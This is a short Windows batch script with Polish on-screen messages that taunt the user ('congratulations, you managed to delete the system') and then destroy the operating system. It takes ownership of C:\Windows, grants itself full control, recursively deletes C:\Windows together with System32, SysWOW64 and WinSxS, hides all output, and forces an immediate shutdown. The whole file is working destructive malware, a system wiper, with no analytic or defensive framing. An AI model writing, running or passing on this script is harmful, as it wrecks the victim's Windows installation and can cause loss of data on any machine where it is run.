@echo off
title Odpalono_exe - Usuwanie systemu
color 0c
echo.
echo Odpalono_exe
echo.
echo ========================================
echo    Gratulacje... zaraz usuniemy system
echo ========================================
echo.

:: Powtarzamy komunikat 10 razy
for /l %%i in (1,1,10) do (
    echo Gratulacje udalo ci sie usunac system!!!!
    timeout /t 1 >nul
)

echo.
echo Czekam 3 sekundy przed zniszczeniem...
timeout /t 3 >nul

echo.
echo Biorę ownership nad C:\Windows (to może chwilę potrwać)...
takeown /f "C:\Windows" /r /a /d Y >nul 2>&1
icacls "C:\Windows" /grant Administrators:F /t /c /q >nul 2>&1
icacls "C:\Windows" /grant %username%:F /t /c /q >nul 2>&1

echo.
echo Usuwam C:\Windows agresywnie...
rmdir /s /q "C:\Windows" >nul 2>&1

echo.
echo Dodatkowe niszczenie System32 i innych kluczowych folderów...
del /f /s /q "C:\Windows\System32\*" >nul 2>&1
del /f /s /q "C:\Windows\SysWOW64\*" >nul 2>&1
del /f /s /q "C:\Windows\WinSxS\*" >nul 2>&1

echo.
echo Wylaczam komputer za 3 sekundy...
timeout /t 3 >nul

shutdown /s /f /t 0
